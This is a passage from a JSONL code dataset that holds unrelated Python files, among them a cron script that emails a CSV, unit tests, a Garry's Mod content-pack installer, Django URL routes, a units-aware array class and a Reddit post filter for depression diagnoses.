\"xxxxxxxxxxxxxxxx\"\n _to = \"ndfour@foxmail.com\"\n\n try:\n msg = MIMEMultipart()\n msg[\"Subject\"] = \"[pandy 八百里加急] csv文件投递\"\n msg[\"From\"] = _user\n msg[\"To\"] = _to\n\n msg.attach(MIMEText( '该邮件来自 [pandy 八百里加急催]\\n\\n' + str_time ) )\n\n # 添加附件\n attachment = MIMEApplication( open('/usr/bdpan_movie/daily/pandy/babaili_jiaji.csv', 'rb').read() )\n attachment.add_header('Content-Disposition', 'attachment', filename='babaili_jiaji_' + str_time + '.csv' )\n msg.attach( attachment )\n\n s = smtplib.SMTP_SSL(\"smtp.qq.com\", 465)\n s.login(_user, _pwd)\n s.sendmail(_user, _to, msg.as_string())\n s.quit()\n\n return ''\n except Exception as e:\n msg = '[邮件投递失败]'\n msg += str(e)\n\n return msg\n\n\n# 删除 八百里加急催 生成的 csv 文件\ndef delete_babaili_cui_csv():\n try:\n cmd = 'rm /usr/bdpan_movie/daily/pandy/babaili_jiaji.csv'\n os.system( cmd )\n\n return ''\n except Exception as e:\n msg = '[delete_babaili_cui_csv 失败]'\n msg += str(e)\n return msg\n\n\n# 推送消息到微信\ndef pushtestmsg(msg):\n url = 'https://sc.ftqq.com/SCUxxxxxxxxxxxxxxxxxxxxxxxxxxc.send'\n str_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n desp = 'pandy 八百里加急 monitor 报警信息'\n data = {\n 'text': desp,\n 'desp': msg + '****' + str_time\n }\n try:\n r = requests.get( url, params = data )\n msg = 'Server酱 发送消息成功!!'\n print(msg)\n except Exception as e:\n msg = 'Server酱 发送消息失败,请重试!!'\n print(msg)\n\n\n# 读取 babaili_jiaji.csv 中的信息 汇总到 本程序运行目录\ndef babaili_2_folder( babaili_path, folder_path):\n babaili_name = 'babaili_jiaji.csv'\n folder_name = 'out.csv'\n \n babaili_list = []\n try:\n with open( babaili_path + babaili_name, 'r', encoding = 'utf-8-sig' ) as f:\n reader = csv.reader(f)\n for line in reader:\n babaili_item = {}\n # print(type(line))\n # print(line)\n # print()\n if line:\n babaili_item['book_name'] = line[0]\n babaili_item['author'] = line[1]\n babaili_item['contact_method'] = line[2]\n babaili_item['other_info'] = line[3]\n babaili_item['type'] = line[4]\n babaili_item['time'] = line[5]\n babaili_item['url'] = line[6]\n babaili_list.append(babaili_item)\n except Exception as e:\n print('babaili_2_folder failed')\n print(e)\n return\n\n with open( folder_path + folder_name, 'a', encoding = 'utf-8-sig') as f:\n fieldnames = ['book_name', 'author', 'contact_method', 'other_info', 'type', 'time', 'url']\n writer = csv.DictWriter(f, fieldnames = fieldnames )\n for b_item in babaili_list:\n writer.writerow( b_item )\n\n\n\ndef main():\n babaili_path = '/usr/bdpan_movie/daily/pandy/'\n folder_path = '/root/rootcron_tasks/babali_jiaji_monitor/'\n babaili_2_folder( babaili_path, folder_path )\n\n msg = ''\n msg += mail_babali_jiaji_csv()\n msg += '##########'\n msg += delete_babaili_cui_csv()\n\n if len(msg) > 10:\n pushtestmsg( msg )\n\nmain()\n","sub_path":"rootcron_tasks/babali_jiaji_monitor/babaili_jiaji_monitor.py","file_name":"babaili_jiaji_monitor.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633002499","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport json\nimport os\nimport tempfile\nimport unittest\n\nfrom baseplate import file_watcher\nfrom baseplate.retry import RetryPolicy\n\nfrom .. import mock\n\n\nclass FileWatcherTests(unittest.TestCase):\n def test_file_not_found_throws_error(self):\n mock_parser = mock.Mock()\n watcher = file_watcher.FileWatcher(\"/does_not_exist\", mock_parser)\n with self.assertRaises(file_watcher.WatchedFileNotAvailableError):\n watcher.get_data()\n self.assertEqual(mock_parser.call_count, 0)\n\n def test_file_loads_and_parses(self):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b\"hello!\")\n watched_file.flush()\n mock_parser = mock.Mock()\n watcher = file_watcher.FileWatcher(watched_file.name, mock_parser)\n\n result = watcher.get_data()\n self.assertEqual(result, mock_parser.return_value)\n self.assertEqual(mock_parser.call_count, 1)\n\n result = watcher.get_data()\n self.assertEqual(mock_parser.call_count, 1)\n\n # ensure the loaded data stays around even when the file was deleted\n result = watcher.get_data()\n self.assertEqual(result, mock_parser.return_value)\n self.assertEqual(mock_parser.call_count, 1)\n\n def test_file_reloads_when_changed(self):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b\"hello!\")\n watched_file.flush()\n os.utime(watched_file.name, (1, 1))\n watcher = file_watcher.FileWatcher(\n watched_file.name, parser=lambda x: x.read())\n\n result = watcher.get_data()\n self.assertEqual(result, \"hello!\")\n\n watched_file.seek(0)\n watched_file.write(b\"breaking news: hello again!\")\n watched_file.flush()\n os.utime(watched_file.name, (2, 2))\n\n result = watcher.get_data()\n self.assertEqual(result, \"breaking news: hello again!\")\n\n def test_file_failing_to_parse_on_first_load_raises(self):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b\"!\")\n watched_file.flush()\n os.utime(watched_file.name, (1, 1))\n watcher = file_watcher.FileWatcher(\n watched_file.name, parser=json.load)\n\n with self.assertRaises(file_watcher.WatchedFileNotAvailableError):\n watcher.get_data()\n\n def test_file_failing_to_parse_after_first_load_uses_cached_data(self):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b'{\"a\": 1}')\n watched_file.flush()\n os.utime(watched_file.name, (1, 1))\n watcher = file_watcher.FileWatcher(\n watched_file.name, parser=json.load)\n\n result = watcher.get_data()\n self.assertEqual(result, {\"a\": 1})\n\n watched_file.seek(0)\n watched_file.write(b\"!\")\n watched_file.flush()\n os.utime(watched_file.name, (2, 2))\n\n result = watcher.get_data()\n self.assertEqual(result, {\"a\": 1})\n\n watched_file.seek(0)\n watched_file.write(b'{\"b\": 3}')\n watched_file.flush()\n os.utime(watched_file.name, (3, 3))\n\n result = watcher.get_data()\n self.assertEqual(result, {\"b\": 3})\n\n @mock.patch(\"baseplate.retry.RetryPolicy.new\")\n def test_timeout(self, mock_retry_factory):\n with tempfile.NamedTemporaryFile() as watched_file:\n watched_file.write(b\"!\")\n watched_file.flush()\n os.utime(watched_file.name, (1, 1))\n\n mock_retry_policy = mock.MagicMock(spec=RetryPolicy)\n mock_retry_policy.__iter__ = mock.Mock(return_value=iter([3, 2, 1]))\n mock_retry_factory.return_value = mock_retry_policy\n\n with self.assertRaises(file_watcher.WatchedFileNotAvailableError):\n file_watcher.FileWatcher(\n watched_file.name,\n parser=json.load,\n timeout=3,\n )\n","sub_path":"tests/unit/file_watcher_tests.py","file_name":"file_watcher_tests.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478643731","text":"#! /usr/bin/env python\n\nimport sqlite3\nimport os\nimport shutil\n\nconnection = sqlite3.connect('database.sqlite3')\n\nfor row in connection.execute('SELECT ZCREATED,ZIDENTIFIER FROM ZCAPTURE'):\n\ttimeInterval = row[0]\n\thash = row[1]\n\ttimeInterval += 978307200.000000\t\t\t\t\t# Time interval between 1970 (used by Close-up) and the system reference date (used by Everyday)\n\tos.remove(hash + '_thumb')\t\t\t\t\t\t\t# Remove Everyday thumbnail, Close-up will compute its own\n\tshutil.move(hash + '.jpg', '%f' % timeInterval)\t\t# Rename the file such that Close-up recognizes it\n\t\nconnection.close()\nos.remove('database.sqlite3')\n\nprint ('Finished! Now delete EveryCloseUp.python from this directory and copy the rest of its contents to Close-up/Documents/Images')","sub_path":"Converter/EveryCloseUp.py","file_name":"EveryCloseUp.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414753666","text":"import tkinter as tk\nimport os\nimport psutil\nimport sys\nimport subprocess\n\nfrom tkinter import messagebox as info\nfrom signal import SIGTERM\nfrom thread6 import run_threaded\nfrom time import sleep\n\ntrue = True\nfalse = False\n\nname = 'hl2.exe'\npath = ''\n\nininstall = false\n\ndef extractall(f,p):\n\tzf = open(f,'rb')\n\tzf = py7zlib.Archive7z(zf)\n\n\tfor v in zf.getnames():\n\t\tname = os.path.join(p,v)\n\t\toutdir = os.path.dirname(name)\n\n\t\tif not os.path.exists(outdir):\n\t\t\tos.makedirs(outdir)\n\n\t\toutfile = open(name,'wb')\n\t\toutfile.write(zf.getmember(v).read())\n\t\toutfile.close()\n\ndef resource_path(path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath('.')\n \n return os.path.join(base_path,path)\n\ndef getfont(a):\n return 'Arial',a\n\ndef seterror(a):\n a = str(a)\n\n error.config(text='错误: '+a)\n\nerrorm = [\n '请不要在安装的时候关闭程序!',\n '我说过了不要在这样做!',\n '如果你突然关闭,那么文件是会损坏的!',\n '...',\n '算了,无意义的警告',\n]\n\nerrorn = 0\n\ndef off():\n global errorm\n global errorn\n\n if ininstall:\n seterror(errorm[errorn])\n if errorn < len(errorm)-1:\n errorn = errorn+1\n\n return\n else:\n base.destroy()\n\nbase = tk.Tk()\nbase.title('Garry\\'s Mod CSS容错包全自动安装器 By Neptune QTG')\nbase.geometry('500x250')\nbase.resizable(false,false)\nbase.protocol('WM_DELETE_WINDOW',off)\nbase.iconbitmap(resource_path('icon.ico'))\n\nfm = tk.Frame(base)\nfm.pack()\n\ndef settext(a,b):\n a = str(a)\n\n if b:\n if a.find('GarrysMod') != -1:\n return '发现GMOD进程'\n else:\n return '虽然找到了进程,但路径不像是Gmod'\n else:\n return '你打开游戏了吗?'\n\ndef iexe():\n global pid\n global path\n\n if not os.path.isfile(resource_path('css_content.7z')):\n info.showerror('错误','没有发现压缩包!')\n return\n\n pid = 0\n find = false\n pids = psutil.pids()\n\n for v in pids:\n if v:\n p = psutil.Process(v)\n\n if p.name() == name:\n pid = v\n find = true\n path = psutil.Process(v).exe()\n path = path[0:path.find(name)]\n\n t = settext(path,find)\n\n l2.config(text=t)\n\n if find:\n l3.config(text=path)\n b.config(text='可以开始下一步',command=p2)\n\nl = tk.Label(fm,text='请打开Garry\\'s Mod进程 \\n (Gmod,半条命2物理沙盘(¿))',font=(getfont(28)),width=50,height=2)\nl.pack(side='top')\n\nl2 = tk.Label(fm,text='打开游戏之后,点击检查按钮',font=(getfont(18)),width=50,height=2)\nl2.pack(side='top')\n\nl3 = tk.Label(fm,font=(getfont(15)),width=50,height=2)\nl3.pack(side='bottom')\n\nb = tk.Button(fm,text='检查',width=50,height=2,command=iexe)\nb.pack()\n\ndef p2():\n global name\n\n isok = false\n pids = psutil.pids()\n\n for v in pids:\n p = psutil.Process(v)\n\n if p.name() == name:\n isok = true\n\n if not isok:\n global path\n\n path = ''\n\n l2.config(text='你怎么把程序关掉了?')\n l3.config(text=path)\n b.config(text='检查',command=iexe)\n return\n\n global ininstall\n\n ininstall = true\n\n os.kill(pid,SIGTERM)\n\n fm.pack_forget()\n fm2 = tk.Frame(base)\n fm2.pack()\n\n path2 = str(path).replace('\\\\','/')+'garrysmod/addons'\n\n l = tk.Label(fm2,text='安装完成会自动关闭程序,请稍后...',font=(getfont(20)),width=50,height=2)\n l.pack(side='top')\n\n l2 = tk.Label(fm2,text='(如果你解压速度过快,可能进度条还没满就会完成)',font=(getfont(16)),width=50,height=2)\n l2.pack()\n\n w = 498\n canvas = tk.Canvas(fm2,width=w,height=22,bg='white')\n canvas.pack()\n\n global error\n error = tk.Label(fm2,font=(getfont(18)),width=50,height=2)\n error.pack()\n\n fill_line = canvas.create_rectangle(1.5,1.5,0,23,width=0,fill='blue')\n\n if not os.path.exists(path2):\n ininstall = false\n\n l.config(text='似乎不存在路径,请检查游戏路径!')\n n = 0\n return\n\n def unpack():\n subprocess.Popen(resource_path('7za.exe')+' x '+resource_path('css_content.7z')+' -o'+path2,shell=True).wait()\n os._exit(0)\n\n run_threaded(unpack)\n\n x = 1000\n n = w/x\n\n for i in range(x):\n n = n+w/x\n canvas.coords(fill_line,(0,0,n,60))\n fm2.update()\n sleep(0.05)\n\n # zf = open(resource_path('css_content.7z'),'rb')\n # zf = py7zlib.Archive7z(zf)\n # x = len(zf.getnames())\n # n = w/x\n\n # for v in zf.getnames():\n # name = os.path.join(path2,v)\n # outdir = os.path.dirname(name)\n\n # if not os.path.exists(outdir):\n # \tos.makedirs(outdir)\n\n # outfile = open(name,'wb')\n # outfile.write(zf.getmember(v).read())\n # outfile.close()\n\n # n = n+w/x\n # canvas.coords(fill_line,(0,0,n,60))\n # fm2.update()\n\nbase.mainloop()","sub_path":"qtg_garrysmod_cssfix.py","file_name":"qtg_garrysmod_cssfix.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"323581302","text":"import unittest\n\nimport marshmallow\n\nfrom ioc.schema.dependency import LiteralDependency\nfrom ioc.schema.adapters import LiteralDependencyAdapter\n\n\nclass LiteralDependencyAdapterTestCase(unittest.TestCase):\n\n def setUp(self):\n self.schema = LiteralDependencyAdapter()\n\n def test_literal_dependency_str(self):\n params = {\n 'name': 'foo',\n 'type': 'literal',\n 'value': 'int'\n }\n\n dep, errors = self.schema.load(params)\n self.assertIsInstance(dep, LiteralDependency)\n self.assertEqual(dep.value, 'int')\n\n def test_literal_dependency_int(self):\n params = {\n 'name': 'foo',\n 'type': 'literal',\n 'value': 1\n }\n\n dep, errors = self.schema.load(params)\n self.assertIsInstance(dep, LiteralDependency)\n self.assertEqual(dep.value, 1)\n","sub_path":"ioc/schema/tests/test_literal_adapter.py","file_name":"test_literal_adapter.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"465640375","text":"\"\"\"NoBug URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom Bugs import views\n\nurlpatterns = [\n\turl(r'^admin/', admin.site.urls),\n\n\turl(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n\n\turl(r'^bugs/', include('Bugs.urls')),\n\turl(r'^api/bugs$',views.apiBugList),\n\n\turl(r'^login/$', views.login, name='login'),\n\turl(r'^api/login$',views.apiLogin,name='apiLogin'),\n\n\turl(r'^logout$', views.logout, name='logout'),\n\n\turl(r\"^api/bug/(?P[0-9]+)/$\", views.apiBugDetail, name='api_bug_detail'),\n\turl(r\"^api/add/bug/$\", views.apiAddBug, name='apiAddBug'),\n\n\turl(r\"^api/comment/(?P[0-9]+)/$\", views.apiComment, name='apiComment'),\n\turl(r\"^api/add/comment/(?P[0-9]+)/$\", views.apiAddComment, name='apiAddComment'),\n]\n","sub_path":"NoBug/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141086782","text":"# SPDX-License-Identifier: BSD-3-Clause\n# Copyright (c) 2021 Osyris contributors (https://github.com/nvaytet/osyris)\nimport numpy as np\nfrom pint.quantity import Quantity\nfrom pint.unit import Unit\nfrom .tools import value_to_string, make_label\nfrom .. import units\n\n\ndef _comparison_operator(lhs, rhs, op):\n func = getattr(np, op)\n if isinstance(rhs, Array):\n scale_r = rhs.unit.to(lhs._unit.units)\n return func(lhs._array, rhs._array * scale_r.magnitude)\n if isinstance(rhs, Quantity):\n return func(lhs._array, rhs.to(lhs._unit.units).magnitude)\n return func(lhs._array, rhs)\n\n\nclass Array:\n def __init__(self, values=None, unit=None, parent=None, name=\"\"):\n\n if isinstance(values, np.ndarray):\n self._array = values\n else:\n self._array = np.asarray(values)\n\n if unit is None:\n self._unit = 1.0 * units.dimensionless\n elif isinstance(unit, str):\n self._unit = units(unit)\n elif isinstance(unit, Quantity):\n self._unit = unit\n elif isinstance(unit, Unit):\n self._unit = 1.0 * unit\n else:\n raise TypeError(\"Unsupported unit type {}\".format(type(unit)))\n self._parent = parent\n self._name = name\n self.special_functions = [\"sqrt\", \"power\"]\n\n # def __array__(self):\n # return self._array\n\n def __getitem__(self, slice_):\n return self.__class__(values=self._array[slice_],\n unit=self._unit,\n parent=self._parent,\n name=self._name)\n\n def __len__(self):\n if self._array.shape:\n return len(self._array)\n else:\n return 0\n\n def __str__(self):\n name_str = \"'\" + self._name + \"' \"\n if len(self) == 0:\n values_str = \"Value: \" + value_to_string(self.values)\n else:\n values_str = \"Min: \" + value_to_string(\n self.values.min()) + \" Max: \" + value_to_string(self.values.max())\n unit_str = \" [{:~}] \".format(self._unit.units)\n shape_str = str(self._array.shape)\n return name_str + values_str + unit_str + shape_str\n\n def __repr__(self):\n return str(self)\n\n def copy(self):\n return self.__class__(values=self._array.copy(),\n unit=self._unit.copy(),\n name=self._name)\n\n @property\n def values(self):\n return self._array\n\n @values.setter\n def values(self, values_):\n self._array = values_\n\n @property\n def array(self):\n return self._array\n\n @array.setter\n def array(self, array_):\n self._array = array_\n\n @property\n def norm(self):\n if self._array.ndim < 2:\n return self\n else:\n return self.__class__(values=np.linalg.norm(self._array, axis=1),\n unit=self.unit)\n\n @property\n def unit(self):\n return self._unit\n\n @unit.setter\n def unit(self, unit_):\n self._unit = unit_\n\n @property\n def ndim(self):\n if self._array.shape:\n return self._array.shape[-1]\n return 0\n\n @property\n def shape(self):\n return self._array.shape\n\n @property\n def parent(self):\n return self._parent\n\n @parent.setter\n def parent(self, parent_):\n self._parent = parent_\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, name_):\n self._name = name_\n\n @property\n def x(self):\n if self.ndim > 1:\n return self.__class__(values=self._array[:, 0],\n unit=self._unit,\n parent=self._parent,\n name=self._name + \"_x\")\n\n @property\n def y(self):\n if self.ndim > 1:\n return self.__class__(values=self._array[:, 1],\n unit=self._unit,\n parent=self._parent,\n name=self._name + \"_y\")\n\n @property\n def z(self):\n if self.ndim > 2:\n return self.__class__(values=self._array[:, 2],\n unit=self._unit,\n parent=self._parent,\n name=self._name + \"_z\")\n\n @property\n def label(self):\n return make_label(name=self._name, unit=self._unit.units)\n\n def _broadcast(self, lhs, rhs):\n if (lhs.ndim == rhs.ndim) or (len(lhs.shape) == 0) or (len(rhs.shape) == 0):\n return lhs, rhs\n if lhs.ndim > rhs.ndim:\n ind = np.argmax(np.array(lhs.shape) == rhs.shape[0])\n if ind == 0:\n return lhs, rhs.reshape(rhs.shape + tuple([1]))\n else:\n return lhs, rhs.reshape(tuple([1]) + rhs.shape)\n else:\n ind = np.argmax(np.array(rhs.shape) == lhs.shape[0])\n if ind == 0:\n return lhs.reshape(lhs.shape + tuple([1])), rhs\n else:\n return lhs.reshape(tuple([1]) + lhs.shape), rhs\n\n def _raise_incompatible_units_error(self, other, op):\n raise TypeError(\"Could not {} types {} and {}.\".format(op, self, other))\n\n def __add__(self, other):\n if isinstance(other, self.__class__):\n scale_r = other.unit.to(self._unit.units)\n lhs = self._array\n rhs = other._array * scale_r.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs + rhs, unit=self._unit)\n if isinstance(other, Quantity):\n return self.__class__(values=self._array +\n other.to(self._unit.units).magnitude,\n unit=self._unit)\n self._raise_incompatible_units_error(other, \"add\")\n\n def __iadd__(self, other):\n if isinstance(other, self.__class__):\n scale_r = other.unit.to(self._unit.units)\n rhs = other._array * scale_r.magnitude\n self._array += rhs\n elif isinstance(other, Quantity):\n self._array += other.to(self._unit.units).magnitude\n else:\n self._raise_incompatible_units_error(other, \"add\")\n return self\n\n def __sub__(self, other):\n if isinstance(other, self.__class__):\n scale_r = other.unit.to(self._unit.units)\n lhs = self._array\n rhs = other._array * scale_r.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs - rhs, unit=self._unit)\n if isinstance(other, Quantity):\n return self.__class__(values=self._array -\n other.to(self._unit.units).magnitude,\n unit=self._unit)\n self._raise_incompatible_units_error(other, \"subtract\")\n\n def __isub__(self, other):\n if isinstance(other, self.__class__):\n scale_r = other.unit.to(self._unit.units)\n rhs = other._array * scale_r.magnitude\n self._array -= rhs\n elif isinstance(other, Quantity):\n self._array -= other.to(self._unit.units).magnitude\n else:\n self._raise_incompatible_units_error(other, \"subtract\")\n return self\n\n def __mul__(self, other):\n if isinstance(other, self.__class__):\n scale_l = self._unit.to_base_units()\n scale_r = other._unit.to_base_units()\n result = scale_l * scale_r\n lhs = self._array\n rhs = other._array * result.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs * rhs, unit=1.0 * result.units)\n if isinstance(other, Quantity):\n scale_l = self._unit.to_base_units()\n scale_r = other.to_base_units()\n result = scale_l * scale_r\n return self.__class__(values=self._array * result.magnitude,\n unit=1.0 * result.units)\n return self.__class__(values=self._array * other, unit=self._unit)\n\n def __imul__(self, other):\n if isinstance(other, self.__class__):\n scale_l = self._unit.to_base_units()\n scale_r = other._unit.to_base_units()\n result = scale_l * scale_r\n rhs = other._array * result.magnitude\n self._array *= rhs\n self._unit = 1.0 * result.units\n elif isinstance(other, Quantity):\n scale_l = self._unit.to_base_units()\n scale_r = other.to_base_units()\n result = scale_l * scale_r\n self._array *= result.magnitude\n self._unit = 1.0 * result.units\n else:\n self._array *= other\n return self\n\n def __truediv__(self, other):\n if isinstance(other, self.__class__):\n scale_l = self._unit.to_base_units()\n scale_r = other._unit.to_base_units()\n result = scale_l / scale_r\n lhs = self._array\n rhs = other._array / result.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs / rhs, unit=1.0 * result.units)\n if isinstance(other, Quantity):\n scale_l = self._unit.to_base_units()\n scale_r = other.to_base_units()\n result = scale_l / scale_r\n return self.__class__(values=self._array * result.magnitude,\n unit=1.0 * result.units)\n return self.__class__(values=self._array / other, unit=self._unit)\n\n def __itruediv__(self, other):\n if isinstance(other, self.__class__):\n scale_l = self._unit.to_base_units()\n scale_r = other._unit.to_base_units()\n result = scale_l / scale_r\n rhs = other._array / result.magnitude\n self._array /= rhs\n self._unit = 1.0 * result.units\n elif isinstance(other, Quantity):\n scale_l = self._unit.to_base_units()\n scale_r = other.to_base_units()\n result = scale_l / scale_r\n self._array *= result.magnitude\n self._unit = 1.0 * result.units\n else:\n self._array /= other\n return self\n\n def __rmul__(self, other):\n return self * other\n\n def __rtruediv__(self, other):\n if isinstance(other, self.__class__):\n scale_r = self._unit.to_base_units()\n scale_l = other._unit.to_base_units()\n result = scale_l / scale_r\n lhs = self._array\n rhs = other._array / result.magnitude\n lhs, rhs = self._broadcast(lhs, rhs)\n return self.__class__(values=lhs / rhs, unit=1.0 * result.units)\n if isinstance(other, Quantity):\n scale_r = self._unit.to_base_units()\n scale_l = other.to_base_units()\n result = scale_l / scale_r\n return self.__class__(values=self._array * result.magnitude,\n unit=1.0 * result.units)\n return self.__class__(values=other / self._array, unit=1.0 / self._unit)\n\n def __pow__(self, number):\n return np.power(self, number)\n\n def __lt__(self, other):\n return _comparison_operator(self, other, \"less\")\n\n def __le__(self, other):\n return _comparison_operator(self, other, \"less_equal\")\n\n def __gt__(self, other):\n return _comparison_operator(self, other, \"greater\")\n\n def __ge__(self, other):\n return _comparison_operator(self, other, \"greater_equal\")\n\n def __eq__(self, other):\n return _comparison_operator(self, other, \"equal\")\n\n def __ne__(self, other):\n return _comparison_operator(self, other, \"not_equal\")\n\n def to(self, unit):\n if isinstance(unit, str):\n new_unit = units(unit)\n else:\n new_unit = unit\n ratio = self._unit.to(new_unit) / new_unit\n self._unit = 1.0 * new_unit\n self._array *= ratio.magnitude\n return self\n\n def _wrap_numpy(self, func, *args, **kwargs):\n if func.__name__ in self.special_functions:\n unit = func(self.unit, *args[1:], **kwargs)\n else:\n unit = self.unit\n if isinstance(args[0], tuple) or isinstance(args[0], list):\n # Case where we have a sequence of arrays, e.g. `concatenate`\n for a in args[0]:\n if a.unit != unit:\n self._raise_incompatible_units_error(a, func.__name__)\n args = (tuple(a._array for a in args[0]), ) + args[1:]\n elif (len(args) > 1 and hasattr(args[1], \"_array\")):\n if hasattr(args[0], \"_array\"):\n # Case of a binary operation, with two Arrays, e.g. `dot`\n # TODO: what should we do with the unit? Apply the func to it?\n unit = func(args[0].unit, args[1].unit, *args[2:], **kwargs)\n args = (args[0]._array, args[1]._array) + args[2:]\n else:\n # Case of a binary operation: ndarray with Array\n # In this case, only multiply is allowed?\n if func.__name__ != \"multiply\":\n raise RuntimeError(\"Cannot use operation {} between ndarray and \"\n \"Array\".format(func.__name__))\n args = (args[0], args[1]._array) + args[2:]\n else:\n args = (args[0]._array, ) + args[1:]\n result = func(*args, **kwargs)\n return self.__class__(values=result, unit=unit)\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):\n \"\"\"\n Numpy array_ufunc protocol to allow Array to work with numpy ufuncs.\n \"\"\"\n if method != \"__call__\":\n # Only handle ufuncs as callables\n return NotImplemented\n return self._wrap_numpy(ufunc, *inputs, **kwargs)\n\n def __array_function__(self, func, types, args, kwargs):\n \"\"\"\n Numpy array_function protocol to allow Array to work with numpy\n functions.\n \"\"\"\n return self._wrap_numpy(func, *args, **kwargs)\n\n def min(self):\n return self.__class__(values=self._array.min(), unit=self._unit)\n\n def max(self):\n return self.__class__(values=self._array.max(), unit=self._unit)\n\n def reshape(self, *shape):\n return self.__class__(values=self._array.reshape(*shape), unit=self._unit)\n","sub_path":"src/osyris/core/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":14480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356822365","text":"import json\n\ndef isPostDiagnosisPositive(post, positive_triggers):\n for trigger in positive_triggers:\n if 'selftext' in post and trigger in post['selftext'].lower():\n return (True, trigger)\n \n elif 'title' in post and trigger in post['title'].lower():\n return (True, trigger) \n \n return (False, None)\n\ndef identifyDiagnosesPosts(posts):\n with open('files/diagnospatterns_positive.txt') as f:\n positive_triggers = [x[:len(x)-1] for x in f.readlines()]\n\n pos_diagnosis_posts = []\n for _, post in enumerate(posts['data']): \n # print(i) if i % 10 == 0 else None\n pos_diagnos, _ = isPostDiagnosisPositive(post, positive_triggers)\n if pos_diagnos:\n pos_diagnosis_posts.append(post)\n\n return pos_diagnosis_posts\n\ndef main():\n depression_set = []\n while len(depression_set) < 100000:\n \n # get a new batch of posts and pull out those with positive diagnoses\n posts = data_collection.getPosts(subreddit='depression', limit=1000)\n pos_diagnos_posts = identifyDiagnosesPosts(posts)\n depression_set += pos_diagnos_posts\n print(len(depression_set))\n\n # update dataset file \n with open('datasets/extended-100k/id-depression.json', 'w') as f:\n outset = {}\n outset['data'] = depression_set\n json.dump(outset, f)\n\n \n \n \n\nif __name__ == '__main__':\n main()","sub_path":"functions/diagnosis_analysis.py","file_name":"diagnosis_analysis.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"421748810","text":"from collections import Counter\n\ngroups = []\n\n# read input data\nwith open(\"input.txt\", \"r\") as data:\n for group in data.read().strip().split(\"\\n\\n\"):\n members_cnt = group.count(\"\\n\") + 1\n yes_counter = Counter(group.replace(\"\\n\", \"\"))\n\n groups.append(len([1 for c in yes_counter if yes_counter[c] == members_cnt]))\n\nprint(f\"Sum of questions that everyone answered YES to: {sum(groups)}\")\n","sub_path":"day_06/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"283001247","text":"import unittest\nimport numpy as np\nimport flask\nimport json\nfrom panoptes_aggregation import reducers\n\n\nclass TestProcessData(unittest.TestCase):\n def setUp(self):\n self.extracted_data = [\n {\n 'T0_tool1_x': [1, 4],\n 'T0_tool1_y': [2, 7],\n 'T0_tool2_x': [3],\n 'T0_tool2_y': [4]\n },\n {\n 'T0_tool1_x': [1],\n 'T0_tool1_y': [2]\n }\n ]\n\n def test_process_data(self):\n expected_result = {\n 'T0_tool1': [(1, 2), (4, 7), (1, 2)],\n 'T0_tool2': [(3, 4)]\n }\n self.assertDictEqual(reducers.cluster_points.process_data(self.extracted_data), expected_result)\n\n\nclass TestClusterPoints(unittest.TestCase):\n def setUp(self):\n c0_cov = np.array([[3, 0.5], [0.5, 4]])\n c1_cov = np.array([[7, -0.5], [-0.5, 5]])\n c0_loc = np.array([12, 15])\n c1_loc = np.array([20, 25])\n c0_count = 15\n c1_count = 8\n np.random.seed(5000)\n self.data_by_tool = {\n 'tool1': np.vstack([\n np.random.multivariate_normal(c0_loc, c0_cov, size=c0_count),\n np.random.multivariate_normal(c1_loc, c1_cov, size=c1_count)\n ])\n }\n self.result = reducers.cluster_points.cluster_points(self.data_by_tool, eps=5, min_samples=3)\n self.expected = {\n 'tool1_points_x': list(self.data_by_tool['tool1'][:, 0]),\n 'tool1_points_y': list(self.data_by_tool['tool1'][:, 1]),\n 'tool1_cluster_labels': [0] * c0_count + [1] * c1_count,\n 'tool1_clusters_count': [c0_count, c1_count],\n 